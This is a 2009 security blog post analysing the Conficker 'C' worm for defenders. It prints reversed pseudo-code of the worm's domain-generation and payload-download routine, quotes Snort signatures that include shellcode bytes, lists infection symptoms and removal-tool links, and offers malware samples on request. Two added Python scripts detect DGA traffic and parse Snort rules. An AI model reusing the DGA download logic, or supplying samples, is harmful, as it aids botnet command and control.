Friday, April 3, 2009

Silence of Storm Worm: Welcome the Rolling Infection of Conficker 'C'

"Conficker .aka. Conflicker .aka. Downup .aka. Downadup .aka. Kido"

The Conficker 'C' variant first appeared on the internet on 20-Nov-2008. This variant differs considerably from 'B': only about 14.9% of the code was found to be similar when their process images were disassembled and compared.

The details of these images can be found at:
http://mtc.sri.com/Conficker/addendumC/HMA_Compare_ConfB2_ConfC/

So what sets variant 'C' apart? Notably, this new variant of Conficker adds a P2P co-ordination channel and a revised domain generation algorithm (DGA). The main features of the Conficker 'C' variant are as follows:

-Generates 50,000 random domain names spread across 110 TLDs (top-level domains) as part of its update process
-Uses encryption, digital signatures and hashing (RC4, RSA and MD6 respectively) to protect its zombies from being hijacked

Conficker.C program logic is given in the figure below (image not reproduced in this copy):
The hybrid nature of variant 'C' brings a new structure/algorithm for generating far more domains than the older 'A' and 'B' variants. The pseudo-code for the new DGA is given below:

===========
int domain_name_generation()
{
    // local declarations
    hMem = 0;
    counter = 0;
    success_download = 0;
    check_if_MS_DEF_PROV();
    get_time_from_popular_web_sites();
    // baidu.com, google.com, yahoo.com, ask.com, w3.org,
    // facebook.com, imageshack.us, rapidshare.com

    hMem = GlobalAlloc(0x40u, 0x30D40u); // global array - 50,000 random names
    if ( hMem )
    {
        while ( 1 )
        {
            counter_domains = counter;
            if ( counter >= 50000 )
                break;

            size_of_name = DGA_random_function() % 6 + 4;
            // size of domain name is between 4 and 10 chars
            // (random characters of the name are generated here; append "." at the end of the name)
            random = DGA_random_function();
            strcat(domainname, TLD_suffix[random % 116]);
            // append 1 of 116 suffixes (from 110 TLDs) to domain name
            ++counter;
        }

        // select and query 500 domains
        counter_domains = 0;
        while ( !success_download && counter_domains < 500 )
        {
            // pick one of the 50,000 generated names: random number modulo 50,000
            one_in_50000_names = hMem[conficker_D_PRNG_function() % 50000];
            hostent = gethostbyname(one_in_50000_names);
            // resolve name to a set of IP addresses
            if ( hostent )
            {
                host_address = hostent->address_list; // get list of IPs
                array_previously_checked_IPs[counter_domains] = host_address;

                if ( *host_address )
                {
                    // skip if domain name resolves to multiple IP addresses
                    if ( !*(host_address + 1) )
                    {
                        // skip if IP is local host or other trivial IPs
                        if ( check_IP_value(host_address) )
                        {
                            is_blacklisted_ip = check_if_IP_is_in_ranges(host_address);
                            // skip if IP is blacklisted
                            if ( !is_blacklisted_ip )
                            {
                                found = 0;
                                index = 0;
                                while ( index < counter_domains )
                                {
                                    if ( host_address == array_previously_checked_IPs[index] )
                                    {
                                        found = 1;
                                        break; // break if IP has been previously encountered
                                    }
                                    ++index;
                                }
                                // skip if IP has been previously encountered
                                if ( !found )
                                {
                                    snprintf(Dest, 0x80u, "http://%s", host_address);
                                    success_download = download_and_validate_file(Dest);
                                    // HTTP request to the domain and download valid file
                                }
                            }
                        }
                    }
                }
            }
            Sleep(...); // sleep small random amount
            ++counter_domains;
        }
    }
    GlobalFree(hMem);
    return success_download;
}
===========

Its P2P architecture also implements binary download validation, HTTP-based date checking via the headers of well-known websites, anti-debugger segments and other logic.
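The pseudo-code above has a defender-side consequence: an infected host issues hundreds of lookups per day for short random labels spread over many TLDs, and almost all of them return NXDOMAIN because the names are never registered. The following Python script, added here as an example (not from the original post or from SRI's analysis), scores DNS clients on that profile. It assumes a simplified log format of "timestamp client qname rcode" and uses constructed sample lines; the thresholds and the TLD pool are illustrative choices, not values from the worm.

```python
"""Flag DNS clients whose query pattern matches the Conficker.C DGA profile.

Added example (not from the original post or from SRI's analysis). The heuristic
follows the pseudo-code above: the worm resolves up to 500 randomly generated names
per day, each a 4-10 character label under one of ~110 TLDs, and nearly all of
them fail to resolve because the domains are never registered.
"""
import random
import re
from collections import defaultdict

# Random-looking second-level labels: 4 to 10 lowercase letters (the DGA length range).
LABEL_RE = re.compile(r"^[a-z]{4,10}$")

# Hypothetical TLD pool used only to construct the sample log (the real worm uses ~110 TLDs).
SAMPLE_TLDS = ["com", "net", "org", "info", "biz", "cc", "ws", "cn", "ru", "de",
               "fr", "it", "nl", "pl", "br", "mx", "ar", "jp", "kr", "tw",
               "in", "au", "nz", "za", "ca", "uk", "ie", "es", "pt", "se",
               "no", "dk", "fi", "ch", "at", "be", "cz", "hu", "ro", "gr"]


def build_sample_log(seed=1):
    """Construct synthetic log lines: one DGA-like client (10.0.0.5) and one normal client (10.0.0.7).

    These are made-up names and addresses, not real Conficker domains or sinkholes.
    """
    rng = random.Random(seed)
    lines = []
    # DGA-like client: 300 lookups of random 4-10 letter labels across many TLDs, ~97% NXDOMAIN.
    for i in range(300):
        label = "".join(rng.choice("abcdefghijklmnopqrstuvwxyz") for _ in range(rng.randint(4, 10)))
        tld = rng.choice(SAMPLE_TLDS)
        rcode = "NOERROR" if rng.random() < 0.03 else "NXDOMAIN"
        lines.append(f"2009-04-03T10:{i // 60:02d}:{i % 60:02d} 10.0.0.5 {label}.{tld} {rcode}")
    # Normal client: repeated lookups of a handful of ordinary names that all resolve.
    normal = ["www.google.com", "mail.example.org", "update.microsoft.com",
              "www.bbc.co.uk", "cdn.example.net"]
    for i in range(300):
        lines.append(f"2009-04-03T10:{i // 60:02d}:{i % 60:02d} 10.0.0.7 {rng.choice(normal)} NOERROR")
    return lines


def parse_line(line):
    """Parse a constructed log line 'timestamp client qname rcode'; return None on junk."""
    parts = line.split()
    if len(parts) != 4:
        return None
    _, client, qname, rcode = parts
    return client, qname.lower().rstrip("."), rcode


def score_clients(lines, min_lookups=100, min_tlds=20, min_nx_ratio=0.8):
    """Return {client: stats} for clients whose DGA-like lookups exceed all three thresholds.

    A single threshold is not enough: ordinary names such as 'google' also match the
    length regex, so the TLD spread and the NXDOMAIN ratio are what separate the two hosts.
    """
    stats = defaultdict(lambda: {"total": 0, "dga_like": 0, "nx": 0, "tlds": set()})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        client, qname, rcode = parsed
        s = stats[client]
        s["total"] += 1
        labels = qname.split(".")
        if len(labels) < 2:
            continue
        sld, tld = labels[-2], labels[-1]  # second-level label and its TLD
        if LABEL_RE.match(sld):
            s["dga_like"] += 1
            s["tlds"].add(tld)
            if rcode == "NXDOMAIN":
                s["nx"] += 1
    flagged = {}
    for client, s in stats.items():
        if s["dga_like"] < min_lookups or len(s["tlds"]) < min_tlds:
            continue
        nx_ratio = s["nx"] / s["dga_like"]
        if nx_ratio >= min_nx_ratio:
            flagged[client] = {"dga_like": s["dga_like"], "tlds": len(s["tlds"]),
                               "nx_ratio": round(nx_ratio, 2)}
    return flagged


if __name__ == "__main__":
    for client, info in score_clients(build_sample_log()).items():
        print(f"{client}: {info}")
```

Running the script flags 10.0.0.5 only; 10.0.0.7 matches the label regex on names like google and microsoft but touches only three TLDs and never gets NXDOMAIN, which is why the three conditions are combined rather than used alone.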


Beyond this, the new variant introduces features that have spread the infection to "millions" of computers worldwide, hitting the French and American Air Force and Navy, hospitals and military networks, and even big players like Microsoft. In response, Microsoft is offering $250,000 to anyone who reports the worm's creator, and some private firms are offering more than $350,000 up to half a million US dollars.

The main symptoms of a Conficker infection can be inferred from the following:

1. Account lockout policies being reset automatically.
2. Certain Microsoft Windows services such as Automatic Updates, BITS, Windows Defender and Error Reporting Services are automatically disabled.
3. Domain controllers respond slowly to client requests.
4. The network becomes unusually congested. This can be checked on the network traffic chart in Windows Task Manager.
5. Websites related to antivirus software and Windows system updates cannot be accessed.
6. Brute force attacks against administrator passwords, which the worm uses to spread through ADMIN$ shares, making the choice of sensible passwords advisable.
7. Port 445/TCP scanning (A/B)
8. Multicast UPnP requests
9. High-port (pseudo-random) TCP and UDP P2P activity
10. Up to 500 DNS lookups/HTTP GET requests across 110 TLDs per day (C variant)
11. Removal of all System Restore Points


Detection Mechanisms:

1. Network Detection Signatures

Snort signatures for A/B shellcodes (presented by the Honeynet Project)
alert tcp any any -> $HOME_NET 445 (msg: "conficker.a shellcode"; content: "|e8 ff ff ff ff c1|^|8d|N|10 80|1|c4|Af|81|9EPu|f5 ae c6 9d a0|O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c cc|IrX|c4 c4 c4|,|ed c4 c4 c4 94|&
--
67.15.94.80 $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible Downadup/Conficker-A Worm Activity"; flow:to_server,established; uricontent:"/GeoIP.dat.gz"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.A; reference:url,www.f-secure.com/v-descs/worm_w32_downadup_a.shtml; reference:url,doc.emergingthreats.net/bin/view/Main/2008802; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Conficker; sid:2008802; rev:3;)
--
alert tcp $HOME_NET any -> [75.126.138.202,72.249.118.38,208.78.69.70,204.13.249.70,208.78.68.70] $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible Downadup/Conficker-A Infection Checking Geographical Location"; flow:to_server; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.A; reference:url,www.f-secure.com/v-descs/worm_w32_downadup_a.shtml; threshold:type both, count 5, seconds 60, track by_src; reference:url,doc.emergingthreats.net/bin/view/Main/2008803; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Conficker; sid:2008803; rev:3;)
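To see what a rule like the one above actually fires on (which destination addresses, how the threshold suppresses repeats, which sid to cite), it helps to parse it into fields. The following Python parser is an added example (not from the original post, Emerging Threats or the Honeynet Project); it handles the single-line rule format shown here, including the pipe-delimited hex in content matches, and uses the sid 2008803 rule quoted above as its embedded sample input. Key names in the returned dictionary are this example's own choices.

```python
"""Parse single-line Snort rules of the kind quoted in the post.

Added example; not part of the original post or of any Snort/ET tooling.
"""
import re

# The sid 2008803 rule from the post, embedded verbatim as sample input.
SAMPLE_RULE = ('alert tcp $HOME_NET any -> [75.126.138.202,72.249.118.38,208.78.69.70,'
               '204.13.249.70,208.78.68.70] $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible '
               'Downadup/Conficker-A Infection Checking Geographical Location"; flow:to_server; '
               'classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/'
               'Entry.aspx?Name=Worm%3aWin32%2fConficker.A; reference:url,www.f-secure.com/'
               'v-descs/worm_w32_downadup_a.shtml; threshold:type both, count 5, seconds 60, '
               'track by_src; reference:url,doc.emergingthreats.net/bin/view/Main/2008803; '
               'reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/'
               'CURRENT_Conficker; sid:2008803; rev:3;)')

# action proto src sport direction dst dport (options)
HEADER_RE = re.compile(
    r'^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$', re.S)


def split_options(body):
    """Split the option body on ';' that sit outside double quotes (honouring backslash escapes)."""
    opts, cur, in_quote, escaped = [], [], False, False
    for ch in body:
        if escaped:
            cur.append(ch)
            escaped = False
        elif ch == '\\':
            cur.append(ch)
            escaped = True
        elif ch == '"':
            in_quote = not in_quote
            cur.append(ch)
        elif ch == ';' and not in_quote:
            token = "".join(cur).strip()
            if token:
                opts.append(token)
            cur = []
        else:
            cur.append(ch)
    tail = "".join(cur).strip()
    if tail:
        opts.append(tail)
    return opts


def parse_ip_list(field):
    """'[a,b,c]' -> (False, [a, b, c]); '$HOME_NET' -> (False, ['$HOME_NET']); '!x' -> negated."""
    negated = field.startswith('!')
    inner = field.lstrip('!').strip('[]')
    return negated, [x.strip() for x in inner.split(',') if x.strip()]


def content_to_bytes(value):
    """Decode a content/uricontent value: text outside |...| is literal, inside is hex bytes."""
    value = value.strip().strip('"')
    out = bytearray()
    for i, chunk in enumerate(value.split('|')):
        out += chunk.encode('latin-1') if i % 2 == 0 else bytes.fromhex(chunk)
    return bytes(out)


def parse_rule(text):
    """Return a dictionary of header fields plus the options a responder usually needs."""
    m = HEADER_RE.match(text.strip())
    if not m:
        raise ValueError("not a single-line Snort rule")
    action, proto, src, sport, direction, dst, dport, body = m.groups()
    rule = {"action": action, "proto": proto, "src": parse_ip_list(src), "sport": sport,
            "direction": direction, "dst": parse_ip_list(dst), "dport": dport,
            "msg": None, "sid": None, "rev": None, "references": [],
            "threshold": None, "contents": [], "options": []}
    for opt in split_options(body):
        name, _, value = opt.partition(':')
        name, value = name.strip(), value.strip()
        rule["options"].append((name, value))
        if name == "msg":
            rule["msg"] = value.strip('"')
        elif name == "sid":
            rule["sid"] = int(value)
        elif name == "rev":
            rule["rev"] = int(value)
        elif name == "reference":
            rule["references"].append(value)
        elif name in ("content", "uricontent"):
            rule["contents"].append(content_to_bytes(value))
        elif name == "threshold":
            # "type both, count 5, seconds 60, track by_src" -> dict
            th = {}
            for part in value.split(','):
                key, val = part.split()
                th[key] = int(val) if val.isdigit() else val
            rule["threshold"] = th
    return rule


if __name__ == "__main__":
    r = parse_rule(SAMPLE_RULE)
    print(r["sid"], r["msg"])
    print("watch-list destinations:", r["dst"][1])
    print("threshold:", r["threshold"])
```

For the sample rule the parser reports sid 2008803, the five destination addresses the rule watches, and a threshold of type both / count 5 / seconds 60 tracked by source, i.e. the alert needs five matching connections from one host within a minute and is then raised once per minute, which is the behaviour to expect when tuning it.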



2. Check your computer for infection (ONLINE)
-http://iv.cs.uni-bonn.de/fileadmin/user_upload/werner/cfdetector/
-http://www.confickerworkinggroup.org/infection_test/cfeyechart.html


3. Removal tools from various AV and security companies
-http://global.ahnlab.com/global/file_removeal_down.jsp?filename=123718304758%2021&down_filename=v3conficker.zip
-http://download.eset.com/special/EConfickerRemover.exe
-http://data2.kaspersky-labs.com:8080/special/KKiller_v3.4.1.zip
-ftp://ftp.f-secure.com/anti-virus/tools/beta/f-downadup.zip
-http://vil.nai.com/vil/stinger/
-http://www.microsoft.com/downloads/details.aspx?FamilyId=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=en
-http://www.sophos.com/products/free-tools/conficker-removal-tool.html
-http://www.symantec.com/content/en/us/global/removal_tool/threat_writeups/FixDwndp.exe
-http://www.trendmicro.com/ftp/products/pattern/spyware/fixtool/SysClean-WORM_DOWNAD.zip

More up-to-date information on current removal tools at:
http://www.dshield.org/diary.html?storyid=5860

Memory Disinfector
http://iv.cs.uni-bonn.de/uploads/media/memscan_01.zip

Detecting Conficker Files and Registry
http://iv.cs.uni-bonn.de/uploads/media/conficker_names.zip

Nonficker Vaxination Tool
http://iv.cs.uni-bonn.de/uploads/media/nonficker_01.zip

4. Sandbox Detection Results (Conficker C)
-http://mtc.sri.com/Conficker/addendumC/appendix4.html

5. Process Image comparison of Conficker 'B' and 'C'
-http://mtc.sri.com/Conficker/addendumC/HMA_Compare_ConfB2_ConfC/

6. Conficker.C Domain Collisions
-http://iv.cs.uni-bonn.de/uploads/media/c_domains_april2009.zip

7. Domain Generator Filtered Address Ranges
-http://mtc.sri.com/Conficker/addendumC/appendix2.html

Samples of "Conficker" worm are available on special request.